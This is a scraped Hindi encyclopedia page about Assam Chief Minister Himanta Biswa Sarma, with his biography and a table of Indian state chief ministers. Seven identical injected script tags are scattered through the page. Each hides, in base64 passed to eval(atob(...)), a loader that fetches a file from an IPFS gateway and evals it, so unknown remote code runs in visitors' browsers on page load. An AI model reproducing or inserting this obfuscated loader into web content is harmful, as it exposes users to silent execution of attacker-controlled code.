हिमंता बिस्वा सरमा  

हिमंता बिस्वा सरमा
पूरा नाम हिमंता बिस्वा सरमा
जन्म 1 फ़रवरी, 1969
जन्म भूमि जोरहट, असम
अभिभावक पिता- कैलाश नाथ सरमा

माता- मृणालिनी देवी

पति/पत्नी रिंकी
संतान नंदिल, सुकन्या
नागरिकता भारतीय
प्रसिद्धि राजनीतिज्ञ
पार्टी कांग्रेस, भाजपा
पद मुख्यमंत्री, असम - 10 मई, 2021 से पदस्थ
विद्यालय गुवाहाटी विश्वविद्यालय
संबंधित लेख असम के मुख्यमंत्री, सर्बानन्द सोनोवाल
अन्य जानकारी हिमंता बिस्वा सरमा पहले कांग्रेस पार्टी में थे लेकिन कुछ मतभेद होने के बाद उन्होंने साल 2015 में पार्टी छोड़ दी थी और बीजेपी में शामिल हो गए थे।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>हिमंता बिस्वा सरमा (अंग्रेज़ी: Himanta Biswa Sarma, जन्म- 1 फ़रवरी, 1969) भारतीय राज्य असम के 15वें मुख्यमंत्री हैं। उन्होंने 2001 से 2015 तक भारतीय राष्ट्रीय कांग्रेस के टिकट से असम के जलकुबारी निर्वाचन क्षेत्र से विधानसभा के रूप में और मई 2016 तक भारतीय जनता पार्टी के सदस्य के रूप में विधायक के रूप में सेवा की है। हिमंता बिस्वा सरमा 2016 की असम विधानसभा का चुनाव जीतकर असम के कैविनेट कैबिनेट मंत्री बने थे। वर्ष 2021 मेंं असम में भाजपा की सरकार आने के बाद हिमंता बिस्वा सरमा वर्तमान में असम के मुख्यमंत्री हैं। उन्होंने 10 मई, 2021 को मुख्यमंत्री पद की शपथ ली है।

परिचय

हिमंता बिस्वा सरमा का जन्म 1 फ़रवरी, 1969 को हुआ था। उनके पिता का नाम कैलाश नाथ सरमा और माता का नाम मृणालिनी देवी है। हिमंता बिस्वा सरमा ने गुवाहाटी के कामरूप एकैडमी स्कूल से शुरुआती पढ़ाई की। इसके बाद उन्होंने गवर्नमेंट लॉ कॉलेज से एलएलबी की पढ़ाई की और फिर गुवाहाटी यूनिवर्सिटी से पीएचडी की डिग्री हासिल की। उन्होंने 1996 से 2001 के बीच गुवाहाटी हाईकोर्ट में लॉ की प्रैक्टिस भी की। हिमंता बिस्वा सरमा ने पहली बार गुवाहाटी के जालुकबाड़ी से सन 2001 में चुनाव लड़ा। उन्होंने यहां असम गण परिषद के नेता भृगु कुमार फुकान को हराया और उसके बाद से आज तक सरमा इस सीट पर जीत दर्ज करते आए हैं।

हिमंता बिस्वा सरमा पहले कांग्रेस पार्टी में थे लेकिन कुछ मतभेद होने के बाद उन्होंने साल 2015 में पार्टी छोड़ दी थी और बीजेपी में शामिल हो गए थे। खबर आई थी कि पूर्व मुख्यमंत्री तरुण गोगोई के साथ राजनीतिक मतभेदों के बाद उन्होंने यह कदम उठाया था।

असम के मुख्यमंत्री

हिमंता बिस्वा सरमा ने 10 मई, 2021 को असम के 15वें मुख्यमंत्री के तौर पर शपथ ली। शपथग्रहण समारोह में भाजपा के राष्ट्रीय अध्यक्ष जे. पी. नड्डा के साथ ही कई अन्य नेता भी मौजूद थे। हिमंता बिस्वा सरमा को असम के राज्यपाल जगदीश मुखी ने शपथ दिलाई। 2 मई को असम चुनाव के नतीजों में बीजेपी को लगातार दूसरी बार जीत मिली थी। हिमंता बिस्वा सरमा के साथ ही 13 अन्य विधायकों ने भी मंत्रिपद की शपथ ली। 9 मई, 2021 को नॉर्थ ईस्ट डेमोक्रेटिक अलायंस (एनईडीए) के संयोजक हिमंता बिस्वा सरमा सर्वसम्मति से बीजेपी विधायक दल के नेता चुने गए थे।

बीजेपी चीफ जे. पी. नड्डा के साथ ही शपथ ग्रहण समारोह में नागालैंड, मणिपुर, त्रिपुरा और मेघालय के मुख्यमंत्री शामिल हुए थे। इसके अलावा केंद्रीय मंत्री जितेंद्र सिंह और असम के पूर्व मुख्यमंत्री सर्बानंद सोनोवाल भी समारोह में मौजूद थे।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

भारतीय राज्यों में पदस्थ मुख्यमंत्री
क्रमांक राज्य मुख्यमंत्री तस्वीर पार्टी पदभार ग्रहण
1. अरुणाचल प्रदेश पेमा खांडू
भाजपा 17 जुलाई, 2016
2. असम हिमंता बिस्वा सरमा
भाजपा 10 मई, 2021
3. आंध्र प्रदेश वाई एस जगनमोहन रेड्डी
वाईएसआर कांग्रेस पार्टी 30 मई, 2019
4. उत्तर प्रदेश योगी आदित्यनाथ
भाजपा 19 मार्च, 2017
5. उत्तराखण्ड पुष्कर सिंह धामी
भाजपा 4 जुलाई, 2021
6. ओडिशा नवीन पटनायक
बीजू जनता दल 5 मार्च, 2000
7. कर्नाटक सिद्धारमैया
भारतीय राष्ट्रीय कांग्रेस 20 मई, 2023
8. केरल पिनाराई विजयन
मार्क्सवादी कम्युनिस्ट पार्टी 25 मई, 2016
9. गुजरात भूपेन्द्र पटेल
भाजपा 12 सितम्बर, 2021
10. गोवा प्रमोद सावंत
भाजपा 19 मार्च, 2019
11. छत्तीसगढ़ विष्णु देव साय
भारतीय जनता पार्टी 13 दिसम्बर, 2023
12. जम्मू-कश्मीर रिक्त (राज्यपाल शासन) लागू नहीं 20 जून, 2018
13. झारखण्ड हेमन्त सोरेन
झारखंड मुक्ति मोर्चा 29 दिसम्बर, 2019
14. तमिल नाडु एम. के. स्टालिन
द्रविड़ मुन्नेत्र कड़गम 7 मई, 2021
15. त्रिपुरा माणिक साहा
भाजपा 15 मई, 2022
16. तेलंगाना अनुमुला रेवंत रेड्डी
भारतीय राष्ट्रीय काँग्रेस 7 दिसंबर, 2023
17. दिल्ली अरविन्द केजरीवाल
आप 14 फ़रवरी, 2015
18. नागालैण्ड नेफियू रियो
एनडीपीपी 8 मार्च, 2018
19. पंजाब भगवंत मान
आम आदमी पार्टी 16 मार्च, 2022
20. पश्चिम बंगाल ममता बनर्जी
तृणमूल कांग्रेस 20 मई, 2011
21. पुदुचेरी एन. रंगास्वामी
कांग्रेस 7 मई, 2021
22. बिहार नितीश कुमार
जदयू 27 जुलाई, 2017
23. मणिपुर एन. बीरेन सिंह
भाजपा 15 मार्च, 2017
24. मध्य प्रदेश मोहन यादव
भाजपा 13 दिसंबर, 2023
25. महाराष्ट्र एकनाथ शिंदे
शिव सेना 30 जून, 2022
26. मिज़ोरम लालदुहोमा
जोरम पीपल्स मूवमेंट 8 दिसम्बर, 2023
27. मेघालय कॉनराड संगमा
एनपीपी 6 मार्च, 2018
28. राजस्थान भजन लाल शर्मा
भारतीय जनता पार्टी 15 दिसम्बर, 2023
29. सिक्किम प्रेम सिंह तमांग
सिक्किम क्रांतिकारी मोर्चा 27 मई, 2019
30. हरियाणा नायब सिंह सैनी
भाजपा 12 मार्च, 2024
31. हिमाचल प्रदेश सुखविंदर सिंह सुक्खू
भारतीय राष्ट्रीय कांग्रेस 11 दिसम्बर, 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>



<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

"https://amp.bharatdiscovery.org/w/index.php?title=हिमंता_बिस्वा_सरमा&oldid=662529" से लिया गया